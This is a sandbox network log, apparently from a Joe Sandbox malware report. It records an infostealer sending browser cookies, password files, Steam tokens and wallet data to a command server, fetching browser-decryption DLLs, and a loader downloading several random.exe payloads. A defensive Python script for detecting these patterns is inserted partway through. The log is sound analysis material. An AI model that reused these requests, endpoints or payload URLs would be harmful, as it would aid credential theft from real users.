Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 46 42 47 44 42 4b 4a 4a 4a 4b 46 49 49 49 4a 4a 2d 2d 0d 0a Data Ascii: ------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------IDAAFBGDBKJJJKFIIIJJContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IDAAFBGDBKJJJKFIIIJJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 46 2d 2d 0d 0a Data Ascii: ------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KJDGDGDHDGDBFIDHDBAFContent-Disposition: form-data; name="file"------KJDGDGDHDGDBFIDHDBAF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 4a 2d 2d 0d 0a Data Ascii: ------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FIIEHJDBKJKECBFHDGHJContent-Disposition: form-data; name="file"------FIIEHJDBKJKECBFHDGHJ--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJEBAECGCBKECAAAEBFHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHDHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 42 47 48 49 45 42 46 49 4a 4b 45 43 42 4b 46 48 44 2d 2d 0d 0a Data Ascii: ------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------HJEBGHIEBFIJKECBKFHDContent-Disposition: form-data; name="message"wallets------HJEBGHIEBFIJKECBKFHD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCAHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 41 2d 2d 0d 0a Data Ascii: ------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------GIJECGDGCBKECAKFBGCAContent-Disposition: form-data; name="message"files------GIJECGDGCBKECAKFBGCA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"------GDHIDHIEGIIIECAKEBFB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 2d 2d 0d 0a Data Ascii: ------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="message"ybncbhylepme------ECFHJKEBAAECBFHIECGI--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 31 61 30 65 37 63 32 61 38 38 66 39 66 66 32 61 34 30 39 34 39 35 37 63 66 65 66 63 31 61 65 31 66 33 39 35 31 62 39 32 34 30 30 65 64 66 31 65 62 32 62 30 36 64 34 37 66 64 61 63 63 65 34 36 63 30 33 32 38 39 64 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"11a0e7c2a88f9ff2a4094957cfefc1ae1f3951b92400edf1eb2b06d47fdacce46c03289d------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BKFBAKFCBFHIJJJJDBFC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013581001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013582001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013583001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCBKKKFHCGCBFIJEHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 36 36 34 45 38 38 38 32 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="hwid"B3664E8882872556134559------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="build"stok------EGHCBKKKFHCGCBFIJEHD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013584001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
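The request lines above show two behaviours worth detecting on their own, independent of any payload signature: the stealer pulling a complete set of helper libraries (the NSS and SQLite DLLs) from one directory on its C2, and the loader fetching a series of random.exe payloads from several hosts. The following is an added example, not code from the Joe Sandbox report; it runs that logic over a request list constructed from the GET/POST lines above. MIN_MATCH is an assumed threshold, not a value the report states.

```python
# Added example (not part of the Joe Sandbox report): flag the helper-DLL
# bundle and the follow-on executable downloads in a request list. The
# sample list is constructed from the GET/POST lines above; MIN_MATCH is
# an assumed threshold, not something the report states.
from collections import defaultdict
from posixpath import basename, dirname

# Libraries the stealer fetched from /68b591d6548ec281/ above: Mozilla NSS
# (nss3, softokn3, freebl3, mozglue) decrypts Firefox logins, sqlite3 reads
# browser SQLite stores, msvcp140/vcruntime140 are their runtime dependencies.
STEALER_DLL_SET = frozenset({
    "sqlite3.dll", "freebl3.dll", "mozglue.dll", "msvcp140.dll",
    "nss3.dll", "softokn3.dll", "vcruntime140.dll",
})
MIN_MATCH = 4  # assumed: alert once this many of the set come from one directory


def find_dll_bundle_fetches(requests):
    """Group GETs for the helper DLLs by (host, directory); keep groups at or over MIN_MATCH."""
    seen = defaultdict(set)
    for host, method, path in requests:
        if method != "GET":
            continue
        name = basename(path).lower()
        if name in STEALER_DLL_SET:
            seen[(host, dirname(path))].add(name)
    return {key: sorted(names) for key, names in seen.items() if len(names) >= MIN_MATCH}


def find_payload_downloads(requests, suffix=".exe"):
    """Return (host, path) for every GET of an executable, in capture order."""
    return [(host, path) for host, method, path in requests
            if method == "GET" and path.lower().endswith(suffix)]


def summarize(requests) -> dict:
    """Combine both indicators into one verdict over the request list."""
    bundles = find_dll_bundle_fetches(requests)
    payloads = find_payload_downloads(requests)
    return {
        "dll_bundle_sources": bundles,
        "payload_downloads": payloads,
        "payload_hosts": sorted({host for host, _ in payloads}),
        "suspicious": bool(bundles) or len(payloads) > 1,
    }


# Constructed from the requests listed in the report, in the order shown.
SAMPLE_REQUESTS = [
    ("185.215.113.206", "GET", "/"),
    ("185.215.113.206", "POST", "/c4becf79229cb002.php"),
    ("185.215.113.206", "GET", "/68b591d6548ec281/sqlite3.dll"),
    ("185.215.113.206", "GET", "/68b591d6548ec281/freebl3.dll"),
    ("185.215.113.206", "GET", "/68b591d6548ec281/mozglue.dll"),
    ("185.215.113.206", "GET", "/68b591d6548ec281/msvcp140.dll"),
    ("185.215.113.206", "GET", "/68b591d6548ec281/nss3.dll"),
    ("185.215.113.206", "GET", "/68b591d6548ec281/softokn3.dll"),
    ("185.215.113.206", "GET", "/68b591d6548ec281/vcruntime140.dll"),
    ("185.215.113.16", "GET", "/mine/random.exe"),
    ("185.215.113.43", "POST", "/Zu7JuNko/index.php"),
    ("31.41.244.11", "GET", "/files/unique2/random.exe"),
    ("185.215.113.16", "GET", "/luma/random.exe"),
    ("185.215.113.16", "GET", "/steam/random.exe"),
    ("185.215.113.16", "GET", "/well/random.exe"),
    ("185.215.113.16", "GET", "/off/random.exe"),
]

if __name__ == "__main__":
    print(summarize(SAMPLE_REQUESTS))
```

Grouping by directory rather than by host is deliberate: the seven DLLs are legitimate Mozilla and Microsoft binaries, so any one of them on its own is noise, but a near-complete set served from a single path on a bare-IP host is the stealer staging its decryption toolchain.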
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 38 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013585001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGIIJDGHCAKFHJEHCFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 33 36 36 34 45 38 38 38 32 38 37 32 35 35 36 31 33 34 35 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 49 49 4a 44 47 48 43 41 4b 46 48 4a 45 48 43 46 2d 2d 0d 0a Data Ascii: ------AKEGIIJDGHCAKFHJEHCFContent-Disposition: form-data; name="hwid"B3664E8882872556134559------AKEGIIJDGHCAKFHJEHCFContent-Disposition: form-data; name="build"stok------AKEGIIJDGHCAKFHJEHCF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 41 37 33 42 36 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EB52A73B65E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
